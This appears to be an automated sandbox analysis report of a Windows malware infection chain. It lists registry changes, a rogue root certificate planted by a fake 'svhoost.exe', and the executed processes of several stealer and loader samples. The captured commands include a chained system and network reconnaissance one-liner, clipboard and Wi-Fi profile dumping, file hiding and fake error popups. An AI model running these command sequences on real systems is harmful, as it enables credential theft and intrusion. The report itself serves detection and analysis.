| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3107365284-1576850094-161165143-1000\{A847B8BD-8526-443F-AFC1-C4DD10F58343} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000016001\f2e8263483.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe
"C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\1000015002\cf2c0e9ce8.exe
"C:\Users\Admin\1000015002\cf2c0e9ce8.exe"
C:\Users\Admin\AppData\Local\Temp\1000016001\f2e8263483.exe
"C:\Users\Admin\AppData\Local\Temp\1000016001\f2e8263483.exe"
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\1000017001\80a7b281bf.exe
"C:\Users\Admin\AppData\Local\Temp\1000017001\80a7b281bf.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffd2dc2ab58,0x7ffd2dc2ab68,0x7ffd2dc2ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1512 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2132 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3004 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3012 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4156 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3028 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3220 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4396 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1596_133631872895951778\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\chcp.com
chcp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe
"C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe"
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Users\Admin\AppData\Local\Temp\SetupWizard.exe
SetupWizard.exe
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe
"C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe"
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
"C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\FirstZ.exe"
C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1248_133631873168067957\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1756 -ip 1756
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 772
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1756 -ip 1756
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 928
C:\Windows\system32\winsvc.exe
"C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 1156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 1164
C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 1188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1004
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
